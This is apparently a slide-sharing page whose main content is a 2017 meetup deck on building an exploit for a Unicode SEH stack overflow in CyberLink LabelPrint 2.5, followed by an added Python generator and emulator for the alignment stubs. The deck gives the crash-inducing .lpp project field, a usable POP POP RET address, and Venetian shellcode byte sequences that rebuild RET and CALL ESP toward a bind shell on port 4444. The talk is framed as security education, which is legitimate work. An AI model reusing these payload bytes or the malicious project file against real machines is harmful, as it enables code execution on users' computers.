Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Andre Hora
 
Python Objects and Data Structure Basics
Python Objects and Data Structure BasicsPython Objects and Data Structure Basics
Python Objects and Data Structure Basics
roldangomezjuan0
 

Recently uploaded (20)

Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
 
Full stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplierFull stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplier
 
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdfSOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
 
Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023
 
Cloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptxCloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptx
 
How Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdfHow Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdf
 
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdfModer Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
 
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
 
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
 
How to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website DevelopmentHow to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website Development
 
The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024
 
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
 
Asset Management software Technologies.pdf
Asset Management software Technologies.pdfAsset Management software Technologies.pdf
Asset Management software Technologies.pdf
 
Viswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrsViswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrs
 
CrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNewsCrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNews
 
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptxGurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
 
Healthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdfHealthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdf
 
Software Development Company in Florida.pdf
Software Development Company in Florida.pdfSoftware Development Company in Florida.pdf
Software Development Company in Florida.pdf
 
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
 
Python Objects and Data Structure Basics
Python Objects and Data Structure BasicsPython Objects and Data Structure Basics
Python Objects and Data Structure Basics
 

CyberLink LabelPrint 2.5 Exploitation Process

  • 1. Exploit Development: Cyberlink LabelPrint 2.5 Unicode Stack Overflow. IT Audit & IT Security Meetup #4 - Sharing in the Cloud, Indonesian Cloud, Jakarta, 13 October 2017
  • 2. Who?
    - Thomas Gregory - @modpr0be: IT Security consultant @Spentera; security researcher (occasionally), focus on Windows exploitation; IT Security trainer (sometimes)
    - f3ci - ????: security researcher; penetration tester, red team; appsec & simple exploit dev
  • 3. What?
    - CyberLink LabelPrint 2.5: labeling software
    - Embedded by default in the CyberLink Power2Go installation
    - Included as bloatware in all Lenovo, HP and Asus laptops somewhere between 2015-2016
  • 4. Why?
    - The exploit development is quite challenging and interesting
    - We want to share it for education purposes only
  • 6. Fuzzing possibility
    - File input: import, open media, open project
    - Registry overflow
  • 7. Tools
    - Immunity Debugger with the mona plugin
    - Editor/IDE (/me using Sublime Text)
  • 8. LabelPrint Project
    - Project file with extension .lpp
    - Header:
      <PROJECT version="1.0.00">
      <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
      <TRACK name="" />
  • 9. The Bug
    - In the name parameter, inside the TRACK tag:
      <PROJECT version="1.0.00">
      <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
      <TRACK name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA" />
      </INFORMATION>
      </PROJECT>
  • 11. Unicode based
    - After the conversion to Unicode, "AA" (0x41 0x41) becomes "A\0A\0", i.e. the little-endian dword 0x00410041
  • 12. What is SEH?
    - A piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception (taken from Corelan)
    - An exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions
    - A catcher, who is trying to catch unusual behavior
  • 13. What is SEH?
    - This structure (also called a SEH record) is 8 bytes and has 2 (4-byte) elements:
      - a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)
      - a pointer to the address of the actual code of the exception handler (SE Handler)
  • 14. Abusing SEH
    - In other words, the payload must do the following things:
      - Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won't kick in.
      - Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)
      - Overwrite the SE handler with a pointer to an instruction that will bring you back to the next SEH record and execute the jumpcode
      - The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten "pointer to next SEH record" will jump to it.
  • 15. Abusing SEH
    - When the exception occurs, the stack looks like this: (figure: top of stack ... our pointer to next SEH address)
    - A possible value to overwrite the SE Handler with is the address of a POP something, POP something, RETN sequence (a return into the stack)
    - It pops the address that sits at the top of the stack, pops again to take the second address, and RETNs to execute the third address (which is now at the top of the stack)
    - That third address is usually the pointer to the next SEH record, i.e. inside our supplied input buffer
  • 16. Abusing SEH Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
  • 17. Unicode?
    - Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner
    - Unicode based exploits usually involve:
      - file/folder naming
      - the part of an input parameter that deals with naming
  • 18. More Info
    - Structured Exception Handler (SEH)
      - https://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx
      - https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
      - https://blog.spentera.com/2011/09/14/seh-based-stack-overflow-the-basic/
    - Unicode based exploit
      - https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
  • 19. SEH + Unicode = Venetian PROBABLY THE MOST HATED COMBINATION
  • 20. Venetian Shellcode
    - One of the registers must point at the beginning of the shellcode
    - One register must point at a memory location that is writeable (and where it's ok to write the new reassembled shellcode)
    - Normal Venetian prepend shellcode:
      - Push another register to the stack (ESP)
      - Pop the stack (ESP) into EAX
      - Align the EAX register with add/sub instructions
      - Push the EAX register onto the stack (ESP)
      - RET (return to the beginning of the shellcode at EAX)
    - Sadly, we won't face a normal Venetian approach
  • 21. Typical Venetian Unicode Prepend Opcode (flow diagram)
    - Align EAX register: if we use EAX as BufferRegister, we need to align EAX to point to our buffer
    - "Stack walking": walk over the next SEH and SEH
    - RET to shellcode: shellcode executed
  • 22. Typical Venetian Unicode Prepend Opcode (EAX is used as BufferRegister; the add/sub values depend on where our buffer is)
      ven = "\x56"          # push esi
      ven += "\x41"         # align
      ven += "\x58"         # pop eax
      ven += "\x41"         # align
      ven += "\x05\x04\x01" # add eax,01000400
      ven += "\x41"         # align
      ven += "\x2d\x01\x01" # sub eax,01000100
      ven += "\x41"         # align
      ven += "\x50"         # push eax
      ven += "\x41"         # align
      ven += "\xc3"         # ret
  • 23. Problem?
    - Limited instructions (because of Unicode)
    - Need to find a Unicode-friendly POP POP RET
    - All byte values between 0x80 and 0xFF are bad characters
    - Yes, the RET opcode (C3) is also in the bad character list
    - Meanwhile, our Venetian shellcode needs a RET (the typical Venetian approach)
  • 24. Sh*t!
  • 25. Solution
    - Find a proper Unicode-friendly PPR (pop pop ret) address somewhere in a library or the executable
    - Create "our version" of RET
    - Fill the stack (ESP) with our shellcode
    - Point our RET to the address of a CALL ESP instruction; this will alter the flow of execution
    - EAX must be pointing to the beginning of our shellcode
    - "Stack walk" until we meet the shellcode
  • 26. Our Venetian Unicode Shellcode (flow diagram)
    - Align EAX register
    - Calculate where RET will be placed
    - Construct RET in EAX
    - Calculate EAX for the CALL ESP opcode
    - Reaching RET, execute CALL ESP
    - Re-align EAX
    - "Stack walk" to shellcode
    - Bind shell on port 4444
  • 27. pop pop ret
    - !mona seh
    - Fortunately, we found one Unicode-friendly address (0x0044002c) in the main program (LabelPrint.exe)
  • 28. Construct RET (1)
    - Calculate the value of the EAX register, preparing the address where we exactly want the decoded RET to be placed later on the stack
    - Limited calculation (because of Unicode)
    - Zero the EAX register first (conceptually xor eax,eax; its encoding 33 C0 contains a bad character, so the stub does it with two ANDs instead, see slide 32)
  • 29. Construct RET (2)
    - Preparing the address to push our RET to:
      - push esp
      - pop eax
      - add eax,01001B00
      - sub eax,01000100
      - push eax
      - pop esp
      ven += "\x42"         # nop
      ven += "\x54"         # push esp
      ven += "\x42"         # nop
      ven += "\x58"         # pop eax
      ven += "\x42"         # nop
      ven += "\x05\x1B\x01" # add eax,01001B00
      ven += "\x42"         # nop
      ven += "\x2d\x01\x01" # sub eax,01000100
      ven += "\x42"         # nop
      ven += "\x50"         # push eax
      ven += "\x42"         # nop
      ven += "\x5c"         # pop esp
  • 30. Construct RET (3)
    - After the calculation in EAX, the stack pointer (ESP) now points at 0x0012F655 (the same value as EAX)
    - This is important for our RET decoding address later
  • 32. Zeroing Out EAX
    - We need to clear the EAX register for the next calculation of the RET opcode
    - After EAX is zeroed out we can calculate the EAX register to reach 0xC300C300 (RET opcode)
    - We can perform the clearing with two AND instructions (7e007e00 AND 01000100 = 0):
      - AND EAX with 7e007e00
      - AND EAX with 01000100
  • 33. Zeroing Out EAX
      ven += "\x42"         # nop
      ven += "\x25\x7e\x7e" # and eax,7e007e00
      ven += "\x42"         # nop
      ven += "\x25\x01\x01" # and eax,01000100
  • 34. Construct RET (5)
    - Preparing the RET opcode:
      - Zero out EAX first (done)
      - XOR EAX with 7f007f00
      - ADD EAX with 44004400 (7f007f00 + 44004400 = c300c300)
      - PUSH EDI
      - PUSH EAX
  • 35. The RET Opcode (1)
      ven += "\x35\x7f\x7f" # xor eax,7f007f00
      ven += "\x42"         # nop
      ven += "\x05\x44\x44" # add eax,44004400
      ven += "\x42"         # nop
      ven += "\x57"         # push edi/padding
      ven += "\x42"         # nop
      ven += "\x50"         # push eax
  • 37. Construct CALL to ESP (1)
  • 38. Construct CALL to ESP (2)
  • 39. Construct CALL to ESP (3)
  • 40. Stack Walk to Shellcode
  • 41. Our Venetian Shellcode
      ven += "\x58"         # pop eax
      ven += "\x42"         # nop
      ven += "\x58"         # pop eax
      ven += "\x42"         # nop
      ven += "\x05\x10\x01" # add eax,01001000, align eax to our buffer
      ven += "\x42"         # nop
      ven += "\x2d\x0e\x01" # sub eax,01000e00, align eax to our buffer
      ven += "\x42"         # nop
      ven += "\x50"         # push eax
      ven += "\x42"         # nop
      ven += "\x5C"         # pop esp
      ven += "\x42"         # nop
      ven += "\x58"         # pop eax
      ven += "\x42"         # nop
      ven += "\x05\x53\x7c" # add eax,7c005300, part of call esp
      ven += "\x42"         # nop
      ven += "\x50"         # push eax
      ven += "\x42" * 68    # padding to fill the stack
      ven += "\x7b\x32"     # part of call esp
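The stubs on slides 29, 33-35 and 41 all lean on one trick: a payload byte below 0x80 widens to "byte 00", so three payload bytes such as 05 1B 01 execute as ADD EAX, 0x01001B00, and a 0x42 between instructions soaks up the leftover 00 as a harmless ADD BYTE PTR [EDX], AL. As an added example (not from the slides or the exploit they describe), the following Python models that widening together with the 0x80-0xFF bad-character rule from slide 23, generates the ADD/SUB pair for an arbitrary EAX delta and the AND/AND/XOR/ADD sequence for any XX00YY00 constant such as the 0xC300C300 RET pair, and traces the widened bytes through a tiny x86 subset to confirm where EAX and ESP end up. The function names are the example's own, and the starting ESP of 0x0012DC55 used in the usage note is an assumption, chosen so the slide-29 stub lands on the slides' 0x0012F655. The example starts at the first real instruction rather than with the leading \x42 of the slides' listings, which pairs with the 00 left by whatever widened bytes executed just before.

```python
"""Added example, not the slides' own exploit code: model the Unicode
widening the slides rely on, generate the EAX arithmetic of the Venetian
stubs, and trace the widened bytes through a small x86 subset.

Each payload byte b < 0x80 is widened to "b 00", so the payload bytes
05 1B 01 run as 05 00 1B 00 01 00 = ADD EAX, 0x01001B00 plus a dangling 00,
which the next 0x42 filler turns into 00 42 00 = ADD BYTE PTR [EDX], AL
(harmless while EDX points to writable memory). Only imm32 values shaped
XX00YY00 with 0 < XX, YY < 0x80 are reachable, which is why 0xC300C300 is
built as XOR 0x7F007F00 into a zeroed EAX followed by ADD 0x44004400."""

FILLER = b"\x42"  # INC EDX on its own; absorbs the previous widening zero otherwise


def to_unicode(payload: bytes) -> bytes:
    """Widen an ASCII-range payload as the target does; 0x80-0xFF are bad chars."""
    bad = [hex(b) for b in payload if b >= 0x80]
    if bad:
        raise ValueError(f"not Unicode-safe: {bad}")
    return b"".join(bytes([b, 0]) for b in payload)


def imm_bytes(value: int) -> bytes:
    """The two payload bytes that widen into imm32 `value` (shape XX00YY00)."""
    hi, lo = (value >> 24) & 0xFF, (value >> 8) & 0xFF
    if value != (hi << 24) | (lo << 8) or not (0 < hi < 0x80 and 0 < lo < 0x80):
        raise ValueError(f"{value:#010x} needs a NUL or a byte >= 0x80")
    return bytes([lo, hi])  # widened to 00 lo 00 hi = little-endian imm32


def eax_delta(delta: int) -> list:
    """ADD/SUB pair with net effect EAX += delta (slide 29 uses delta 0x1A00)."""
    base = 0x01000100  # NUL-free baseline, as on the slides
    if delta >= 0:
        return [b"\x05" + imm_bytes(base + delta), b"\x2d" + imm_bytes(base)]
    return [b"\x05" + imm_bytes(base), b"\x2d" + imm_bytes(base - delta)]


def esp_align_stub(delta: int) -> bytes:
    """PUSH ESP / POP EAX / adjust EAX / PUSH EAX / POP ESP: move ESP by delta."""
    return FILLER.join([b"\x54", b"\x58", *eax_delta(delta), b"\x50", b"\x5c"])


def eax_const(target: int) -> list:
    """Zero EAX (0x7E007E00 & 0x01000100 == 0), then reach a XX00YY00 target
    whose bytes may exceed 0x7F by XOR-ing in one half and ADD-ing the rest."""
    hi, lo = (target >> 24) & 0xFF, (target >> 8) & 0xFF
    if target != (hi << 24) | (lo << 8):
        raise ValueError(f"{target:#010x} does not have the XX00YY00 shape")
    xor_imm = add_imm = 0
    for shift, byte in ((24, hi), (8, lo)):
        first = min(byte, 0x7F)              # 0xC3 -> 0x7F + 0x44
        xor_imm |= first << shift
        add_imm |= (byte - first) << shift
    instrs = [b"\x25" + imm_bytes(0x7E007E00), b"\x25" + imm_bytes(0x01000100),
              b"\x35" + imm_bytes(xor_imm)]
    if add_imm:                              # bytes below 0x80 need no ADD
        instrs.append(b"\x05" + imm_bytes(add_imm))
    return instrs


def push_const_stub(target: int) -> bytes:
    """Slides 33-35: build `target` in EAX, PUSH EDI as padding, PUSH EAX."""
    return FILLER.join(eax_const(target) + [b"\x57", b"\x50"])


def emulate(stream: bytes, eax=0, esp=0x0012F000, edx=0, edi=0) -> dict:
    """Trace widened bytes through the opcodes the stubs use. Stack slots live
    in `mem`; the byte store of each 00 42 00 filler is ignored."""
    regs = {"eax": eax, "esp": esp, "edx": edx, "edi": edi}
    mem, i = {}, 0
    while i < len(stream):
        op = stream[i]
        if op == 0x00:                                # ADD [reg+disp8], r8
            if i + 3 > len(stream):
                break                                 # trailing widening zero
            modrm = stream[i + 1]
            if modrm >> 6 != 1 or modrm & 7 == 4:     # mod must be 01, no SIB
                raise ValueError(f"misaligned stream at offset {i}")
            i += 3
        elif op in (0x05, 0x2D, 0x25, 0x35):          # ADD/SUB/AND/XOR EAX, imm32
            imm, a = int.from_bytes(stream[i + 1:i + 5], "little"), regs["eax"]
            regs["eax"] = {0x05: a + imm, 0x2D: a - imm,
                           0x25: a & imm, 0x35: a ^ imm}[op] & 0xFFFFFFFF
            i += 5
        elif op in (0x50, 0x54, 0x57):                # PUSH EAX / ESP / EDI
            val = regs[{0x50: "eax", 0x54: "esp", 0x57: "edi"}[op]]  # old ESP
            regs["esp"] = (regs["esp"] - 4) & 0xFFFFFFFF
            mem[regs["esp"]] = val
            i += 1
        elif op in (0x58, 0x5C):                      # POP EAX / POP ESP
            val = mem.get(regs["esp"], 0)
            regs["esp"] = (regs["esp"] + 4) & 0xFFFFFFFF
            regs["eax" if op == 0x58 else "esp"] = val
            i += 1
        elif op == 0x42:                              # filler at an instruction start
            regs["edx"] = (regs["edx"] + 1) & 0xFFFFFFFF
            i += 1
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {i}")
    return {**regs, "mem": mem}
```

`esp_align_stub(0x1A00)` reproduces the slide-29 listing without its leading \x42, and `emulate(to_unicode(esp_align_stub(0x1A00)), esp=0x0012DC55)` ends with ESP = EAX = 0x0012F655. `emulate(to_unicode(push_const_stub(0xC300C300)), eax=0xDEADBEEF, esp=0x0012F655)` leaves EAX = 0xC300C300 and that dword pushed at 0x0012F64D; in memory the little-endian dword reads 00 C3 00 C3, so the two C3 bytes sit at odd offsets from the slot. `eax_const(0xFF00FF00)` raises, since 0xFF cannot be split into two bytes below 0x80, and `to_unicode` rejects anything in the bad-character range.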
  • 43. Solution
    - For now, do not use CyberLink LabelPrint.